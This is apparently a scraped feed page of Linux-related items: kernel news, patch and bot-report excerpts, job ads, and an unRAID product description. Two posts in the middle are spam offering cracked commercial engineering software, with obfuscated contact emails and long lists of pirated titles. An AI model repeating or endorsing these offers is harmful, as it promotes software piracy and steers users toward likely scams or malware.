The touch command allows us to update the timestamps on existing files and directories as well as creating new, empty files.
          Linus Torvalds Says Linux 5.0 Comes in 2019, Kicks Off Development of Linux 4.20      Cache   Translate Page      
Linus Torvalds is back from a short vacation to rethink his strategy as the leader of the development of the Linux kernel, and kicked off a new development cycle for the next 6 weeks, this time for Linux kernel 4.20.
          Softwareentwickler (m/w) DevOps / Linux / Windows      Cache   Translate Page      
Softwareentwickler (m/w) DevOps / Linux / Windows Hectronic GmbH Bonndorf im Schwarzwald Sie arbeiten in unserer Business-Unit Parken selbstständig an der Neu- und Weiterentwicklung unserer Produkte (speziell an Cloud-Lösungen) und gestalten diese aktiv;... ein klares ziel vor augen durchstarten und sich dann über eine erfolgreiche arbeit freuen das wollen wir und zwar mit ihnen wir sind ein
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I[he]#039[/he]m filling in again for this weeks top 10 while Rikki Endsley is recovering from LISA 18 held last week in Nashville, Tennessee. We[he]#039[/he]re starting to gather articles for our 4th annual Open Source Yearbook, get your proposals in soon. Enjoy this weeks[he]#039[/he] top 10.
          pyusbdux added to PyPI      Cache   Translate Page      
API for the USB-DUX DAQ boxes for Linux (www.linux-usb-daq.co.uk)
          Running Java on Azure      Cache   Translate Page      
Azure is Microsofts cloud platform. It is the home of Service Apps, Logic Apps, cloud storage, Kubernetes Service and provides the foundation for VSTS (now Azure DevOps), Office 365 and loads of other services and tools. But not only for .NET based services and applications. Todays Microsoft provides options for Linux developers, OSX teams, Docker containers, Python code, Node.js and
          Comment on Swift Programming Tutorial for Beginners (Full Tutorial) by csreindeer      Cache   Translate Page      
+CodeWithChris yeah I hope. Converting types in swift is so smooth and easy and in general good design. I know ots available for linux and you can "theoretically" compile it for windows. I guess we will see
          Odposlech mobilů pomocí Stingray a hackovací nástroje NSA (OpenAlt)      Cache   Translate Page      
[18 minut čtení] Jak se odposlouchávaly mobily v minulosti a jak se to dělá dnes? Jak mocné jsou uniklé hackovací nástroje od NSA? Na co se zaměřit při bezpečném používání linuxového desktopu? Nejen o tom se mluvilo na OpenAltu. V době analogových bezdrátových systémů byly na světě tři rozšířenější standardy: americký AMPS, evropský NMT-450 a německý C-Netz. Tehdejší mobily měly různé velikosti, největší byl několikakilogramový kufřík. Postupně se dařilo velikosti snižovat až po kapesní řešení.
          Senior Site Reliability Engineer (DevOps/R&D/AWS) - Cvent - Fredericton, NB      Cache   Translate Page      
CI Server administration and support (Jenkins). Solid Windows and Linux administration skills. Enlighten, Enable and Empower a fast-growing set of multi...
From Cvent - Fri, 02 Nov 2018 06:25:11 GMT - View all Fredericton, NB jobs
          UNIX ENGINEER III - OneNeck IT Solutions - Madison, WI      Cache   Translate Page      
Professional level or higher certification in (Linux, Oracle Virtual Machine (OVM), HP-UX) preferred. Technology experience in (MS-SQL, Oracle, Informix, or...
From OneNeck IT Solutions - Tue, 06 Nov 2018 00:54:48 GMT - View all Madison, WI jobs
          Собель М. - Linux. Администрирование и системное программирование      Cache   Translate Page      
Собель М. - Linux. Администрирование и системное программированиеLinux. Администрирование и системное программирование — Эта книга представляет собой всеобъемлющее руководство по работе, настройке, администрированию и системному программированию операционных систем семейства UNIX/Linux, включая Ubuntu, Fedora, openSUSE, Red Hat, Debian, Mandriva, Mint и даже Mac OS X.
          Linux Systems Administrator 3 - Catapult Consultants, LLC - Pensacola, FL      Cache   Translate Page      
Master’s degree in technical field plus four (4) year of relative IT administration experience OR Bachelor's degree in technical field plus six (6) years of...
From Catapult Consultants, LLC - Wed, 07 Nov 2018 03:14:21 GMT - View all Pensacola, FL jobs
          Oracle Continues Long-Term Support for Amazon Linux      Cache   Translate Page      

On October 30, Oracle announced that both OpenJDK 8 and OpenJDK 11 will continue their long-term support for Amazon Linux until June 30, 2023.

Since the announcement that Oracle will no longer provide long-term support for the OpenJDK beginning January 2019, this has sparked a lot of interest in the Java community over support for Amazon Web Services. Oracle and Amazon wanted to reassure devs that OpenJDK 8 and OpenJDK 11 LTS will continue for Amazon Linux until mid-2023.


          general protection fault in locks_remove_flock      Cache   Translate Page      
syzbot writes: (Summary) 3c 02 00 0f 85 17 01 00 00 48 8b 5b 08 48 85 db 74 0d e8 f2 40 RSP: 0018:ffff8801895a7880 EFLAGS: 00010202 RAX: dffffc0000000000 RBX: 0000000041b58ab3 RCX: ffffffff81ed555d RDX: 000000000836b157 RSI: ffffffff81ed5c71 RDI: 0000000041b58abb RBP: ffff8801895a7a60 R08: ffff880194096140 R09: ffffed003b5c5b67 R10: ffffed003b5c5b67 R11: ffff8801dae2db3b R12: ffff8801cb266ac0 R13: ffff8801895a78f8 R14: 1ffff100312b4f13 R15: dffffc0000000000 FS: 0000000002927940(0000) GS:ffff8801dae00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000400200 CR3: 00000001bd0d5000 CR4: 00000000001406f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: locks_remove_file+0x148/0x5c0 fs/locks.c:2607 __fput+0x2f0/0xa70 fs/file_table.c:271 ____fput+0x15/0x20 fs/file_table.c:312 task_work_run+0x1e8/0x2a0 kernel/task_work.c:113 tracehook_notify_resume include/linux/tracehook.h:188 [inline]
          Re: [PATCH 11/11] [media] marvell-ccic: provide a clock for the sensor      Cache   Translate Page      
Dan Carpenter writes: (Summary) Locked on: line 1673
Unlocked on: line 1682
Unlocked on: line 1682
# https://github.com/0day-ci/linux/commit/a4f7d692c7067355da433bbb534531a4e1a55ac6 git remote add linux-review https://github.com/0day-ci/linux git remote update linux-review
git checkout a4f7d692c7067355da433bbb534531a4e1a55ac6 vim +1682 drivers/media/platform/marvell-ccic/mcam-core.c vim +1682 drivers/media/platform/marvell-ccic/mcam-core.c abfa3df3 drivers/media/video/marvell-ccic/mcam-core.c Jonathan Corbet 2011-06-11 1656 abfa3df3 drivers/media/video/marvell-ccic/mcam-core.c Jonathan Corbet 2011-06-11 1657 /* ---------------------------------------------------------------------- */ abfa3df3 drivers/media/video/marvell-ccic/mcam-core.c Jonathan Corbet 2011-06-11 1658 /* d43dae75 drivers/media/video/marvell-ccic/mcam-core.c Jonathan Corbet 2011-07-0
          Re: [PATCH 4/6] drivers: base: Introducing software nodes to the f ...      Cache   Translate Page      
Dan Carpenter writes: (Summary) Hi Heikki,
Hi Heikki,
url: https://github.com/0day-ci/linux/commits/Heikki-Krogerus/device-property-Introducing-software-nodes/20181106-031310 url: https://github.com/0day-ci/linux/commits/Heikki-Krogerus/device-property-Introducing-software-nodes/20181106-031310 smatch warnings:
drivers/base/swnode.c:391 fwnode_create_software_node() error: dereferencing freed memory 'swnode' drivers/base/swnode.c:391 fwnode_create_software_node() error: dereferencing freed memory 'swnode' # https://github.com/0day-ci/linux/commit/a8c9678ea46a0171baed68e4ec355a9b3f967458 git remote add linux-review https://github.
          [PATCH 23/23] SUNRPC discard cr_uid from struct rpc_cred.      Cache   Translate Page      
NeilBrown writes: (Summary) 12 ++++++------ 3 files changed, 6 insertions(+), 9 deletions(-) diff --git a/include/linux/sunrpc/auth.h b/include/linux/sunrpc/auth.h index 5486082d3d63..eed3cb16ccf1 100644 --- a/include/linux/sunrpc/auth.h +++ b/include/linux/sunrpc/auth.h @@ -58,8 +58,6 @@ struct rpc_cred { refcount_t cr_count; } @@ -1497,7 +1497,7 @@ gss_match(struct auth_cred *acred, struct rpc_cred *rc, int flags) } else { if (gss_cred->gc_principal != NULL) return 0;
          [PATCH 13/23] SUNRPC: introduce RPC_TASK_NULLCREDS to request auth ...      Cache   Translate Page      
NeilBrown writes: (Summary) 19 ++++++------------- 3 files changed, 9 insertions(+), 13 deletions(-) diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h index f542dad8d4ab..bd722ebc70b7 100644 --- a/include/linux/sunrpc/sched.h +++ b/include/linux/sunrpc/sched.h @@ -118,6 +118,7 @@ struct rpc_task_setup { */ #define RPC_TASK_ASYNC 0x0001 /* is an async task */ #define RPC_TASK_SWAPPER 0x0002 /* is swapping in/out */ +#define RPC_TASK_NULLCREDS 0x0010 /* Use AUTH_NULL credential */ #define RPC_CALL_MAJORSEEN 0x0020 /* major timeout seen */ #define RPC_TASK_ROOTCREDS 0x0040 /* force root creds */ #define RPC_TASK_DYNAMIC 0x0080 /* task was kmalloc'ed */ diff --git a/net/sunrpc/auth.c b/net/sunrpc/auth.c index 9e709dcc8c39..dcfcc590b34e 100644 --- a/net/sunrpc/auth.c +++ b/net/sunrpc/auth.c @@ -761,6 +761,8 @@ rpcauth_bindcred(struct rpc_task *task, struct rpc_cred *cred, int flags) ;
          [PATCH 11/23] SUNRPC: discard RPC_DO_ROOTOVERRIDE()      Cache   Translate Page      
NeilBrown writes: (Summary) 1 - 1 file changed, 1 deletion(-) diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h index 7b540c066594..f542dad8d4ab 100644 --- a/include/linux/sunrpc/sched.h +++ b/include/linux/sunrpc/sched.h @@ -131,7 +131,6 @@ struct rpc_task_setup { #define RPC_IS_ASYNC(t) ((t)->tk_flags & RPC_TASK_ASYNC) #define RPC_IS_SWAPPER(t) ((t)->tk_flags & RPC_TASK_ROOTCREDS) #define RPC_ASSASSINATED(t) ((t)->tk_flags & RPC_TASK_KILLED) #define RPC_IS_SOFT(t) ((t)->tk_flags &
          [PATCH 09/23] NFSv4: add cl_root_cred for use when machine cred is ...      Cache   Translate Page      
NeilBrown writes: (Summary) diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c index 62ae0fd345ad..032d3ec929f3 100644 --- a/fs/nfs/nfs4state.c +++ b/fs/nfs/nfs4state.c @@ -166,24 +166,28 @@ int nfs40_discover_server_trunking(struct nfs_client *clp, struct rpc_cred *nfs4_get_machine_cred_locked(struct nfs_client *clp) { - struct rpc_cred *cred = NULL; } static struct rpc_cred * diff --git a/include/linux/nfs_fs_sb.h b/include/linux/nfs_fs_sb.h index 0fc0b9135d46..fea51b44fe50 100644 --- a/include/linux/nfs_fs_sb.h +++ b/include/linux/nfs_fs_sb.h @@ -59,6 +59,7 @@ struct nfs_client { u32 cl_minorversion;/* NFSv4 minorversion */ struct rpc_cred *cl_machine_cred;
          [PATCH 08/23] SUNRPC: remove machine_cred field from struct auth_cred      Cache   Translate Page      
NeilBrown writes: (Summary) 5 +---- 3 files changed, 8 insertions(+), 12 deletions(-) diff --git a/include/linux/sunrpc/auth.h b/include/linux/sunrpc/auth.h index 831ea65bd9f4..1c0468f39479 100644 --- a/include/linux/sunrpc/auth.h +++ b/include/linux/sunrpc/auth.h @@ -46,9 +46,8 @@ enum { struct auth_cred { const struct cred *cred; */ struct rpc_cred *rpc_lookup_machine_cred(const char *service_name) { struct auth_cred acred = { .principal = service_name, - .machine_cred = 1, .cred = get_task_cred(&init_task), };
          Ďalšia verzia linuxového jadra stále nebude 5.0, zrejme sa ňou stane nasledujúca      Cache   Translate Page      
Ďalšia verzia linuxového jadra stále nebude 5.0, zrejme sa ňou stane nasledujúca
          [PATCH 04/23] cred: allow get_cred() and put_cred() to be given NULL.      Cache   Translate Page      
NeilBrown writes: (Summary) 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/include/linux/cred.h b/include/linux/cred.h index 48979fcb95cf..4907c9df86b3 100644 --- a/include/linux/cred.h +++ b/include/linux/cred.h @@ -237,7 +237,7 @@ static inline struct cred *get_new_cred(struct cred *cred) * @cred: The credentials to reference * * Get a reference on the specified set of credentials. Although the * pointer is const, this will temporarily discard the const and increment the @@ -248,6 +248,8 @@ static inline struct cred *get_new_cred(struct cred *cred) static inline const struct cred *get_cred(const struct cred *cred) { struct cred *nonconst_cred = (struct cred *) cred;
          [PATCH 02/23] cred: add get_cred_rcu()      Cache   Translate Page      
NeilBrown writes: (Summary) 2 +- 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/include/linux/cred.h b/include/linux/cred.h index f1085767e1b3..48979fcb95cf 100644 --- a/include/linux/cred.h +++ b/include/linux/cred.h @@ -252,6 +252,17 @@ static inline const struct cred *get_cred(const struct cred *cred) return get_new_cred(nonconst_cred); } +static inline const struct cred *get_cred_rcu(const struct cred *cred) +{ + struct cred *nonconst_cred = (struct cred *) cred; +} + /** * put_cred - Release a reference to a set of credentials * @cred: The credentials to release diff --git a/kernel/cred.c b/kernel/cred.c index 0b3ac72bd717..ba60162249e8 100644 --- a/kernel/cred.c +++ b/kernel/cred.c @@ -195,7 +195,7 @@ const struct cred *get_task_cred(struct task_struct *task) do { cred = __task_cred((task));
          红帽发布RHEL 7.6 版本      Cache   Translate Page      
红帽于10月30日宣布推出旗舰红帽企业Linux(RHEL)7.6版本,为组织提供更好的安全性,管理和容器功能。增强功能包括支持用于安全验证的可信平台模块(TPM)2.0规范。RedHat旗舰Linux平台的新版本增加了TPM2.0对安全认证的支持,以及集成开源nftables防火墙技术的努力。 ...
          Re: [PATCH v2] lockdown: allow kexec_file of unsigned images when ...      Cache   Translate Page      
kbuild test robot writes: (Summary) Yet something to improve:
[auto build test ERROR on linus/master]
[also build test ERROR on v4.20-rc1 next-20181106]
[if your patch is applied to the wrong git tree, please drop us a note to help improve the system] [if your patch is applied to the wrong git tree, please drop us a note to help improve the system] url: https://github.com/0day-ci/linux/commits/Thadeu-Lima-de-Souza-Cascardo/lockdown-allow-kexec_file-of-unsigned-images-when-not-under-lockdown/20181106-081252 config: x86_64-fedora-25 (attached as .config)
compiler: gcc-7 (Debian 7.3.0-1) 7.3.0
reproduce:
# save the attached .config to linux build tree
make ARCH=x86_64
make ARCH=x86_64
All errors (new ones prefixed by >>):
All errors (new ones prefixed by >>):
kernel/kexec_file.c: In
          ​A kinder, gentler Linus Torvalds and Linux 4.20      Cache   Translate Page      
The next release of Linux is on the way, and it comes without fireworks from Linus Torvalds.
          linux-next: Tree for Nov 7      Cache   Translate Page      
Stephen Rothwell writes: (Summary) "REUSEPORT") Merging wireless-drivers-next/master (7d129adff3af rtlwifi: rtl8192de: Fix misleading REG_MCUFWDL information) Merging bluetooth/master (8053e5b93eca Merge tag 'trace-v4.20-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/rostedt/linux-trace) Merging mac80211-next/master (4b42745211af Merge tag 'armsoc-soc' of git://git.kernel.org/pub/scm/linux/kernel/git/arm/arm-soc) Merging gfs2/for-next (82a3ca565664 gfs2: Put bitmap buffers in put_super) Merging mtd/mtd/next (d24dbd7541ff mtd: maps: Get rid of the latch-addr-flash driver) Merging nand/nand/next (647ad49ca672 staging: Remove the mt29f_spinand driver) Merging spi-nor/spi-nor/next (41fe242979e4 mtd: spi-nor: fsl-quadspi: fix read error for flash size larger than 16MB) Merging crypto/master (a1c6fd4308d3 crypto: chelsio - Update ntx queue received from cxgb4) Merging drm/drm-next (651022382c7f Linux 4.20-rc1) Merging drm-panel/drm/panel/for-next (e4bac408b084 drm/panel: simple: Add support for Winstar WF35LTIACD) Merging drm-intel/for-linux
           Proton Windows-to-Linux compatibility layer pretends Nvidia is AMD to improve stability       Cache   Translate Page      
Nvidia's NVAPI library in hindering Linux cross-compatibility
          Boris.Continuum.Complete.v5.01      Cache   Translate Page      

Crack download software Motorcad v11 CLC Genomics Workbench 9.x DHI MIKE ZERO v2016 ispring platform sdk 6.2.0
UASMaster v8 Zemax v2017
Brian28#india.com------ change "#" to "@"
Anything you need,You can also check here: ctrl + f

Intel Parallel Studio XE 2016 with Update 1 winlinux         
Xilinx Vivado Design Suite 2015.4       
MSC Actran v15.1                   
PTC MathCAD 15.0 M045
Concepts Nrec Axcent 8.4.11.0   
Concepts Nrec Max-Pac 8.4.11.0   
Concepts Nrec Pumpal 8.4.11.0 
Csimsoft Trelis Pro v15.2.1 WinMacLnx
Delcam Postprocessor v2014 R2 SP1
Dlubal RFEM v5.05 Win64
Dlubal RSTAB v8.05 Win64
Micro-Cap v11.0.1.5 Win32_64
DS CATIA V5 R2014 SP6
DS CATIA V5-6R2012 SP6 HotFix26
DS_CATIA_V5-6R2013_SP6_HF07
DS_CATIA_V5-6R2014_SP6 HF04
FACERIG.PRO.V1.241
Zirkonzahn modellier 1.0
CD-Adapco SPEED 10.06
Bentley AutoPIPE Advanced V8i SELECTseries 5 v09.06.01.10 & Nozzle 8.11.08.23
Hex-Rays IDA Pro 6.8 Incl. All Decompilers
Intergraph CADWorx (Plant, P&ID, Equipment, IP, SpecEditor) 2016 v16.0
Mastercam X9 version 18.0.15514
Mentor.Graphics.Tessent.2013.1.Linux
Twinmotion v2016
Nozzle Pro 2011 v1.0.83
NETool v3.2
Optimal Solutions Sculptor v3.7.8 x64 WinLnx
PipeFlow Expert 2016 v7.30
PowerSurfacing v2.2-2.4-3.0 for SW2012-2016 64bit
Premier.System.X6.v16.0.9980
PROKON.V3.0.07 x32
GateCycle v6.1 sp1
Ansys Products v17.0 Win64Linux64
Capture Smart3D v4.0
SolidWorks 2016 SP1.0
MetaCAM EX v6.1
CLC Genomics Workbench 8.x
PTC Creo v3.0 M070
schneider electric 2005(concept 2.6 powersuite 1.5)
s7 200 opc server pc access 1.0 v1.0
CimPack v10.3.3
VirtualGrid VRMesh Studio v8.51
rocscience Slide v6.037
Siemens NX 8.5.3 MP11 win_linux
THE_FOUNDRY_MARI_V3.0V1_WIN64linux64
Thunderhead Engineering PyroSim 2015.4.1208 x64
TSIS CORSIM v5.1
Primavera P6 Pro R15.2
AutoSPRINK VR11 Win32
Pipeline Studio v4.0.0.0
Hypersizer Pro v6.4.53
QuickBooks Pro 2016
TracePro v7.43 x64
Vertical Mapper v3.7
Tekla Structures v21.1 SR2 Win64
IES-Coulomb Electro v92 win7x32x64
VMWARE.VSPHERE.V6.0
wonderware intouch fsgateway 1.5 sp1
Wilcom EmbroideryStudio e3.0     
whittle v4.3
LcinkCTF V2.3
Mentor Graphics SystemVision 2016 v16.1
Wolfram SystemModeler v4.2 winLinuxMacosx
Mott MacDonald STEPS v5.1.0034
Intergraph CAESAR II 2016 v8.00.00.5600
Agisoft PhotoScan Professional v1.2.1 Build 2278 Win32_64
Blue Marble Geographic Calculator v2016 Win32_64
Bricsys.BricsCAD.Platinum.v16.1.05.3 x32x64
CLC.Main.Workbench.v5.5
Concept.SpiceVision v6.1.0.Win
rsnetworx for devicenet 6.0
ge interllution ifix v3.5
Invensys SimSci-Esscor PROII v9.4
logvision v4.0
techno ejay 5
Robotmaster V6 with SP3 x86x64
PVElite v2016
Mentor Graphics Nucleus Source Code 2015.07 Lniux   
Mentor Graphics Sourcery CodeBench 2014.05.46 Linux
VPstudio v12.01 SP2 x32x64
Steel.Connection.Studio.v15.02.04.01
Skyline Photomesh v6.6.1
jason v9.5.1
ESRI ArcGIS Desktop v10.4
3D-Tool V12.0
mikroC PRO for PIC 2015 v6.6.1
DownStream Products v2015.12
Gstarsoft.GstarCAD.v2016.x64
hyperMILL v2014.1 SP1
CSI.Bridge.2016.v18.1.0.1227
Antenna Magus Professional v5.5.0
IBM Rational Software v9.0
Luxion.Keyshot.v6.0 Win32_64
Norsar 2d 3d v5.3.1
Lumerical.2016a.build.736.WinLinuxMac
PARTsolutions V9.01
IBM Rational Rhapsody v8.10
MecSoft RhinoCAM 2016 For Rhinoceros 5 v6.0.0.215 Win64
Schlumberger Petrel 2014.2 With plugins Win64
Synopsys CustomSim (XA) 2013 Linux32_64
synopsys design complier DC 2013.03 SP1
Inpho UASMaster 7.0.1   
DesignBuilder.Software.Ltd.DesignBuilder.v4.5     
FTI FormingSuite v2015.2.0.2123 Win32_64     
Golden Software Voxler v4.1.509       
MicroSurvey FieldGenius v8.1.15.5     
NextLimit Realflow v2015.9.1.1.0186 WinMacOSXLinux       
Steel.Connection.Studio.v15.02.04.01       
TDM.Solutions.RhinoGOLD.v5.7.0.6 
hrs strata v10   
Transoft Solutions AutoTURN v1.0.3.148 For Autodesk Revit 2016         
Transoft Solutions AutoTURN v9.1.0.108
The Foundry Mari v3.0V2 Win64Linux64MacOSX64     
The Foundry Mischief v2.1.3 winmac       
Thinkbox.Deadline.v7.2.1.10 winlinuxmac       
Thinkbox.Sequoia.v1.0.0.MacOSX     
Vero VISI v2016 R1       
VisualPVT v3.7.0.97


          Cast WYSIWYG light design R38 3D      Cache   Translate Page      

TEST Crack software 2017��SCADE Suite R17.3 midas gen v2018 Sprutcam v10.3 VMGSim v10.0.13 Trimble TILOS v10
Suntim28#gmail.com------ change "#" to "@"
Anything you need,You can also check here: ctrl + f

Marvelous Designer 6.5 Enterprise 3.1.22 Win64
Quux.Sincpac.C3D.2017. v3.19.6327 for Civil 3D 2014-2018
Tecplot.360EX+Chorus.2017.2.0.79771.Win64.&.Linux64.&.MacOSX64
Tecplot.Focus.2017.2.0.79771.Win64.&.Linux64.&.MacOSX64
VERO PEPS v11.0
zemax v2016.5 SP4
Autodesk ArtCAM Premium 2018 Win64
Autodesk PowerShape 2018 Win64
ESI ITI SimulationX v3.8.1.44662
Altair.Flux.12.3.Win64
Vectric Aspire v8.5.1.7 x86_x64
B&K.PULSE.21.0.0.584.Win32_64
CNC.Consulting.EditCNC.v3.0.2.9
COMSOL.Multiphysics.5.3.Full.Windows.&.Linux
solidThinking.Click2Cast.4.1.0.100.Win64
Dlubal RFEM 5.06.1103 & RSTAB 8.06.1103.Win64
ITI.Transcendata.CADFIX.v11.SP1
Landmark EDM R5000.1.10.0
ERDAS IMAGINE Inc ORIMA v2016.x64
Landmark Geographix Discovery v2016 Win64 
NI AWR Design Environment Analyst v13.01.8345.1 Win64 
PCI.Geomatica.2017.Win64 
solidThinking.Click2Cast.4.1.0.102.Win64
solidThinking Click2Cast 4.1.0.102 Win64 
Ansys.Products.18.1.Win64Linux64
Ansys.Electronics.18.1
ANSYS.SpaceClaim.incl.DesignSpark.Mechanical.2017.1.Win64 
Uconeer 2.4
ihs subpump 2018 v1.0
Datamine DataBlast v2.0
Cadence IC 06.17.721 Virtuoso Linux
Creative Edge Software iC3D Suite 4.1.1 Win64
DELMIA.VMAP.V5-6R2017.SP2.Win32
HEEDS.MDO.2017.04.Win64.&.Linux64 
IMOLD.v13.SP4.2.for.SolidWorks.2011-2017.Win32_64 
midas.NFX.2017.R1.20161104.Win64
Oasys Flow 9.0.13.0 Win64 
Oasys MassMotion 9.0.13.0 Win64 
OkMap Desktop 13.7.3
Siemens.CD-Adapco.BDS.12.02.011.Win64 
Siemens.CD-Adapco.Speed.12.02.011.Win64
CSI SAP2000 v19.1.1 Win32_64 
Delcam DuctPost 1.6.10
IDEA.StatiCa.v8.0.16.43607.Win32_64 
Kelton Engineering FloCalc v1.72 
PolyBoard Pro-PP v6.05
RES2DINV v3.57
Vero WorkNC 2017 R2
CSI SAP2000 v19.1.1
Mentor Graphics Tanner L-Edit 2016.2
Bentley STAAD Planwin 14.00.05.00
CATIA DELMIA ENOVIA v5-6R2015 SP6
Dlubal COMPOSITE-BEAM 8.09.01 Win64
Dlubal CRANEWAY 8.09.01 Win64
Dlubal PLATE-BUCKLING 8.09.01 Win64
Dlubal RX-TIMBER 2.09.01 Win64
Dlubal SHAPE-MASSIVE 6.58.01 Win32
Dlubal SHAPE-THIN 8.09.01 Win64
Bentley STAAD Advanced Concrete Design RCDC 06.01.01.04
Bentley.STAAD.RCDC.v6.0.1.1
Encom ModelVision v14.0
CATIA Composer R2018 build 7.5.0.1279 Win64
Sysnopy Coretools vK-2015.06 SP5 Linux32_64
Cadence Design Systems OpenPOWER Compliance Kits for Sigrity 2017
Geometric.Stackup.2.1.0.15228.Win32_64
Siemens.FEMAP.v11.4.0.Win64
Tensilica Xtensa Xplorer 7.0.9 Linux
Ventuz.Technology.Ventuz.v5.3.1.150.Win64
Cadence Design Systems Sigrity 2017 HF003
CAE.Datamine.Studio.RM.v1.3.36.0.Multilanguage.Win64
CFTurbo.10.2.6.708.Win64
PTC.Mathcad.Prime.4.0.M010.Win32_64
ADINA System 9.3.2 Win64 & Linux64
CPFD Barracuda VR 17.2.0 Win64 & Linux64
Invensys.SimSci.Esscor.DYNSIM.v5.32
MSC Simufact.Forming 14.0.1
Excess-evolution v3.5.2
QITeam v2018
Topcon DynaRoad v5.5.4 Win32_64
Schneider Electric (ex. Invensys) SimSci PRO II v10.0
Golden.Software.MapViewer.v8.5.535.Win32_64
IHS EViews v10.0 Win32_64
Heidelberg Prinect Package Designer 2017 v17.00.22
FlowCode Pro 7.1.1.0
GeometryWorks 3D Features v17.0.5 for SolidWorks 2017
Mentor Graphics FloTHERM v12.0 Suite Win64 & Linux64
Mentor Graphics FloEFD v16.2 Suite Win64
Geomagic Freeform 2017.0.93 Win64
Geomagic Freeform Plus 2017.0.93 Win64
Geomagic Sculpt 2017.0.93 Win64
Intergraph ERDAS PRO600 2016 for MicroStation V8i
InnovMetric.PolyWorks.2017.IR3.Win32_64
Mentor Graphics FloTHERM XT 3.1 Win64
PolyBoard Pro-PP v6.05b
UTS.TK.Solver.v5.00.140
SMT Kingdom v2017
Agisoft PhotoScan Pro v1.4.2 x86x64
Altium Designer v18.1.5 Build 160
ASVIC.Mech-Q.Full.Suite.v4.44.004.ACAD.2000-2019.x32.x64
CTiWare.Vespa.Wall.Designer.v2.5.12.6522
ECam v3.3.0.519
Ensoft DynaN v3.0.13
Ensoft DynaPile 2016.3.1
Ensoft Lpile 2018.10.04
Ensoft PYWall v2015.5.20
SolidPlant 3D v2017
Sigasi Studio XL DOC v3.8 VHDL
PTC Creo Elements Direct Modeling v19.0 F00
Pixologic ZBrush 1.55b Win32
Ansys.OptiSLang.6.2.0.44487.Win.Linux.X64
Autodesk.Robot.Structural.Analysis.Pro.2018.0.2 x64
Boole.&.Partners.PolyBoard.Pro.v6.05d
CorelCAD.v2017.5
Dassault.Systemes.SolidWorks.2018.SP0
DATAKIT.2017.4.SolidWorks.Import.Export.Plugins
DATAKIT.CrossManager.2017.4
Dlubal.RSTAB.v8.08.02.129659
DRS.Technologies.Orca3D.v1.4.20170915.X64
Eleco.ArCon.v18.0.2.Ultimate
MiniTAB.Companion.v5.11
MiniTAB.Express.v1.51
Oracle.Crystal.Ball.v11.1.2.4.850
Siemens.FEMAP.v11.4.1
TEKLA.STRUCTURES.V2017i
TEKLA.STRUCTURES.V2017.SR4
Dlubal.RSTAB.v8.08.02.129659.Win64
ETA.PreSys.2018.R1.Win64
NCG CAM v15.0.04
SolidWorks.2018.SP0.Premium.Win32_64
DATAKIT 2017.4 Import-Export Plugins for SolidWorks 2010-2018 Win32_64
DATAKIT.CrossManager.2017.4.Win32_64
InnovMetric.PolyWorks.2017.IR5.Win32_64D
Mestrelab Research Mnova 12.0.0 Win32
Siemens.FEMAP.v11.4.1.Win64
Zuken CADSTAR v16.0


          Lime Tech unRAID Server OS 6.6.3      Cache   Translate Page      

http://www.hostpic.org/images/1811070813310108.jpg

Lime Tech unRAID Server OS 6.6.3 | 260 Mb
Where many competitors have focused on creating an appliance offering, unRAID has taken a hardware-agnostic approach to network-attached storage. The benefit is unRAID's ability to boot on nearly any x86 64-bit capable system and manage an array of disks that vary in size, speed, brand, and protocol. In addition, by eliminating the use of traditional RAID-based technologies, we can scale on-demand by adding more disks and without needing to rebalance data.

unRAID's storage capabilities are broken down into three components: the array, the cache, and the user share file system.

unRAID Array
The primary concept behind an unRAID array is its ability to manage an aggregate of disk devices (JBOD) that is protected by a dedicated parity device. A parity device provides a way for you to reconstruct data from a failed disk onto a new one. While it seems mind boggling that one drive can possibly back up other drives that have way more storage capacity than the parity, it is able to reconstruct the missing data from a failed drive using binary logic called XOR (eXclusive-OR). Since hard drives store data as zeroes and ones, when a drive fails the parity compares the binary data on all the surviving drives and can deduce the missing data to rebuild.

unRAID Cache
The cache drive feature of unRAID provides faster data capture. Generally speaking, by using a cache alongside an array of 3 or more devices, you can achieve up to 3x write performance. When data is written to a user share that has been configured to use the cache device, all of that data is initially written directly to the dedicated cache device. Because this device is not a part of the array, the write speed is unimpeded by parity calculations. Subsequently an unRAID process called "the mover" copies the data from the cache to the array at time and frequency of your choosing. Once the data has been successfully copied, the space on the cache drive is once again freed up to front-end other write operations to cache-enabled user shares.

Cache Pool
With a single cache device, data captured there is at risk, as a parity device doesn't protect it. However, you can configure a cache with multiple devices both to increase your cache capacity as well as to add protection for that data. The grouping of multiple devices in a cache is referred to as building a cache pool. The unRAID cache pool is created through a unique twist on traditional RAID 1. Here are just some of the benefits:

Improved Data Protection
With a single cache device, there's a possibility that you can lose your data if the device fails before the data gets moved to the array. With a cache pool, however, all write operations are replicated across two separate disks to ensure that the loss of any one drive in the pool does not result in data loss.

Increased System Uptime
If a cache pool device fails, the system will continue to operate as normal. No need to drop everything to deal with a system outage. You can simply change the device when convenient.

Better Scalability
Add more devices of different sizes to your pool as you need to and grow on-demand.

Optimized for SSDs
unRAID now has native support for TRIM, which can substantially reduce the number of write operations when used as a cache device. Benefits of SSDs vs. HDDs:

- They don't require time to 'spin up' or consume a lot of power to operate (they are fast and efficient);
- They are also smaller, so you can fit more of them into a smaller space for highly compact, crazy fast storage.
- When used for storing large quantities of smaller files (e.g., metadata), SSDs can provide a faster response time for these files to the application compared to spinning hard disks; and
- SSDs are most ideal for supporting virtual machines. VM performance benefits on an SSD are comparable to what a user would experience with them on a desktop PC vs. a spinning disk.

Optimized for Virtualization
Virtual machines and applications can have their data reside on the cache pool permanently for overall improved performance, while keeping mass-storage content on the array still accessible to those virtual instances using VirtFS (for KVM Virtual Machines) and Docker (for Containers). Given the desire for "fast-as-you" responsiveness in application and machine performance, using the cache pool for virtual machine/application storage is a no-brainer. Use of SSDs in a cache pool extends this benefit even further.

unRAID Shares
